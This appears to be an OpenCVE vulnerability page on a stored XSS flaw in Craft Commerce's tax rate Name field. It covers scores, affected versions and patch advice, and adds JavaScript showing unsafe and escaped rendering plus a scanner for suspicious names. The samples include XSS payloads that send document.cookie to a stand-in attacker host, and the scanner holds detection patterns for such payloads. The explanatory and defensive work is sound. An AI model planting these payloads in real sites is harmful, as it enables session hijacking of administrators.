Description
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator's browser. This occurs because the Tax Rates 'Name' field in the Store Management section is not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Published: 2026-02-03
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting in Admin Panel
Action: Immediate Patch
AI Analysis

Impact

Craft Commerce, the ecommerce plugin for Craft CMS, contains a stored cross‑site scripting flaw (CWE‑79) in the “Name” field of tax rates under Store Management. The field is saved and later displayed in the control panel without adequate output encoding, so a user who can create or edit a tax rate can store a name containing script that runs in the browser of any administrator who views that rate. The script executes inside the viewing administrator's session, so the attacker can steal session cookies, modify data, or take further actions as that administrator; when the viewer holds more rights than the author of the tax rate, this is the privilege escalation the advisory title refers to.
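
The bug class above, shown as an added example (not Craft Commerce's control‑panel template, which is Twig/PHP and is not reproduced on this page): a row renderer that interpolates the stored tax rate name verbatim beside one that encodes every untrusted value for the context it lands in. The record shape, the control‑panel URL path and the function names are assumptions for illustration; the sample records are constructed.

```javascript
// Added illustration of the bug class described above (untrusted tax rate name
// reaching admin-panel HTML unencoded). This is NOT Craft Commerce's template
// code; the record shape, the CP URL path and the function names are assumed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for insertion into HTML text or a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the name is interpolated verbatim, so markup saved by
// whoever created the tax rate becomes live markup for every viewer.
function renderTaxRateRowUnsafe(rate) {
  return `<tr><td><a href="/admin/commerce/tax/taxrates/${rate.id}">${rate.name}</a></td>` +
         `<td>${rate.rate}</td></tr>`;
}

// Hardened pattern: every untrusted value is encoded for the context it lands
// in (HTML text for name and rate, URL path segment for the id).
function renderTaxRateRowSafe(rate) {
  return `<tr><td><a href="/admin/commerce/tax/taxrates/${encodeURIComponent(rate.id)}">${escapeHtml(rate.name)}</a></td>` +
         `<td>${escapeHtml(rate.rate)}</td></tr>`;
}

// Constructed sample records: one ordinary rate and one whose name carries a
// payload of the kind the advisory describes (exfiltrates document.cookie).
const SAMPLE_RATES = [
  { id: 1, name: 'Standard VAT', rate: 0.2 },
  { id: 2, name: '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">', rate: 0 },
];

// Count elements in the rendered HTML that the template itself never writes.
// In a browser these would execute; here we detect them with a conservative scan.
function countInjectedElements(html) {
  const injected = html.match(/<(img|script|svg|iframe|object|embed)\b/gi);
  return injected ? injected.length : 0;
}

function renderTable(rates, renderRow) {
  return `<table>${rates.map(renderRow).join('')}</table>`;
}

const unsafeHtml = renderTable(SAMPLE_RATES, renderTaxRateRowUnsafe);
const safeHtml = renderTable(SAMPLE_RATES, renderTaxRateRowSafe);
console.log('injected elements (unsafe):', countInjectedElements(unsafeHtml)); // 1
console.log('injected elements (safe):  ', countInjectedElements(safeHtml));   // 0
```

The point of the hardened renderer is that encoding is chosen per output context. Twig, which Craft's control panel uses, auto‑escapes the HTML text context by default, so this class of bug usually enters through a `|raw` filter, an attribute built by string concatenation, or a value dropped into an inline script block; the advisory does not state which path Craft Commerce took, only that display‑time sanitisation was missing.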

Affected Systems

The affected product is Craft Commerce, the ecommerce plugin for Craft CMS, from vendor Craft CMS (tracked by NVD as craftcms:craft_commerce). The vulnerability is present in every release from 4.0.0‑RC1 through 4.10.0 and from 5.0.0 through 5.5.1, and was fixed in 4.10.1 and 5.5.2 respectively. Any installation on an earlier version of either release line is at risk. The affected component is the Tax Rates “Name” field, written through the Store Management section of the control panel by users who hold the permission to manage tax rates.

Risk and Exploitability

The CVSS v4.0 base score is 6.1 (Medium) with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N: the attacker needs high privileges (an account that can create or edit tax rates), the victim only has to view the page (passive user interaction), and the impact falls on a subsequent system, the viewing administrator's browser session, where integrity is rated high. NVD's CVSS v3.1 assessment is 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N), likewise high privileges required, user interaction required, and changed scope. The EPSS value is below 1 %, and the vulnerability is not in the CISA KEV catalog, but the SSVC record lists Exploitation as “poc”, meaning a public proof of concept exists. In practice the attack path is an authenticated user of the commerce back‑office who can modify a tax rate storing a payload that runs later, in the admin context, when a more privileged administrator opens the rate.

Generated by OpenCVE AI on April 18, 2026 at 00:12 UTC.

Remediation

A vendor fix is available: Craft Commerce 4.10.1 for the 4.x line and 5.5.2 for the 5.x line, as stated in the description and the GHSA advisory. No separate workaround is published by the vendor.

OpenCVE Recommended Actions

  • Patch Craft Commerce to version 4.10.1 (4.x line) or 5.5.2 (5.x line), whichever applies to your installation.
  • Until the update is applied, restrict the permission to create or edit tax rates to a small set of trusted administrators; that permission is the only known injection path.
  • Apply a Content Security Policy to the Craft CMS control panel that disallows inline scripts and approves only known sources. Roll it out in report‑only mode first: the control panel relies on its own scripts, and a policy that blocks them will break the admin UI before it blocks an attacker.
  • Review existing tax rate names for HTML markup, event‑handler attributes, or URL/entity‑encoded equivalents, and alert on changes to tax rate names. The fix changes how the field is displayed, so an already‑stored payload should be removed from the record rather than assumed gone.

Generated by OpenCVE AI on April 18, 2026 at 00:12 UTC.
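
The review step in the last recommendation, as an added example rather than an OpenCVE or Craft tool: an audit function run over rows of tax rate ids and names, which first decodes the percent‑ and entity‑encodings an attacker might use to slip past a naive “contains <” check, then applies a small rule set and reports why each row was flagged. The row shape mirrors what a query of the tax rates table would return; the table and column names are assumed and the sample rows are constructed.

```javascript
// Added example for the monitoring recommendation above: flag tax rate names
// that contain markup or script-bearing constructs. Not an OpenCVE or Craft
// tool; rows mimic `SELECT id, name FROM <tax rates table>` (table name assumed).

// Decode the common encodings an attacker might use to defeat a naive check:
// percent-encoding and numeric/named HTML entities. Single-pass only; a
// double-encoded payload would need another round.
function normalise(name) {
  let s = String(name);
  try { s = decodeURIComponent(s); } catch (_) { /* not percent-encoded; keep as-is */ }
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)));
  s = s.replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
  s = s.replace(/&lt;/gi, '<').replace(/&gt;/gi, '>').replace(/&quot;/gi, '"').replace(/&amp;/gi, '&');
  return s;
}

// Triage rules: each hit is a reason for a human to look, not proof of attack.
const RULES = [
  { reason: 'html-tag',       re: /<\s*\/?\s*[a-z!\/]/i },
  { reason: 'event-handler',  re: /\bon[a-z]+\s*=/i },
  { reason: 'javascript-uri', re: /javascript\s*:/i },
  { reason: 'script-keyword', re: /\b(?:script|iframe|svg|object|embed)\b/i },
  { reason: 'dangerous-func', re: /\b(?:eval|fetch|document\.cookie|XMLHttpRequest|location)\b/i },
];

// Returns [{ id, name, reasons }] for rows whose decoded name trips any rule.
// 'encoded' is added when the stored value differed from its decoded form.
function findSuspiciousTaxRateNames(rows) {
  const flagged = [];
  for (const row of rows) {
    const decoded = normalise(row.name);
    const reasons = RULES.filter((r) => r.re.test(decoded)).map((r) => r.reason);
    if (reasons.length && decoded !== String(row.name)) reasons.push('encoded');
    if (reasons.length) flagged.push({ id: row.id, name: row.name, reasons });
  }
  return flagged;
}

// Constructed sample rows (not real data).
const SAMPLE_ROWS = [
  { id: 1, name: 'Standard VAT' },
  { id: 2, name: 'Reduced rate (food & drink)' },                  // bare ampersand is benign
  { id: 3, name: '<script>fetch("//attacker.invalid/"+document.cookie)</script>' },
  { id: 4, name: '%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E' },     // percent-encoded
  { id: 5, name: 'VAT&#60;svg onload=alert(1)&#62;' },             // entity-encoded
  { id: 6, name: 'Zero-rated' },
];

for (const hit of findSuspiciousTaxRateNames(SAMPLE_ROWS)) {
  console.log(`tax rate ${hit.id}: ${hit.reasons.join(', ')} -> ${JSON.stringify(hit.name)}`);
}
```

Run it against a periodic export of the tax rates table, or wire the same rules into whatever change‑auditing the control panel already feeds, and treat any hit as a record to inspect and, if confirmed, to delete from the database rather than merely rename in the UI.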

Advisories
Source        ID                    Title
GitHub GHSA   GHSA-wqc5-485v-3hqh   Craft CMS has Stored XSS in Tax Rates Name Leading to Potential Privilege Escalation
History

Tue, 10 Feb 2026 18:15:00 +0000 (values added; nothing removed)

  First Time appeared:  Craftcms craft Commerce
  CPEs:                 cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*
                        cpe:2.3:a:craftcms:craft_commerce:4.0.0:-:*:*:*:craft_cms:*:*
                        cpe:2.3:a:craftcms:craft_commerce:4.0.0:rc1:*:*:*:craft_cms:*:*
  Vendors & Products:   Craftcms craft Commerce
  Metrics (cvssV3_1):   {'score': 4.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}

Wed, 04 Feb 2026 22:15:00 +0000 (values added; nothing removed)

  Metrics (ssvc):       {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 04 Feb 2026 12:15:00 +0000 (values added; nothing removed)

  First Time appeared:  Craftcms
                        Craftcms commerce
  Vendors & Products:   Craftcms
                        Craftcms commerce

Tue, 03 Feb 2026 18:30:00 +0000 (values added; nothing removed)

  Description:          Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator's browser. This occurs because the Tax Rates 'Name' field in the Store Management section is not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
  Title:                Craft CMS has Stored XSS in Tax Rates Name Leading to Potential Privilege Escalation
  Weaknesses:           CWE-79
  References:           (none listed)
  Metrics (cvssV4_0):   {'score': 6.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-04T21:13:17.130Z

Reserved: 2026-02-02T16:31:35.822Z

Link: CVE-2026-25487

Vulnrichment

Updated: 2026-02-04T21:13:11.213Z

NVD

Status : Analyzed

Published: 2026-02-03T19:16:26.360

Modified: 2026-02-10T18:10:55.623

Link: CVE-2026-25487

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T00:15:31Z

Weaknesses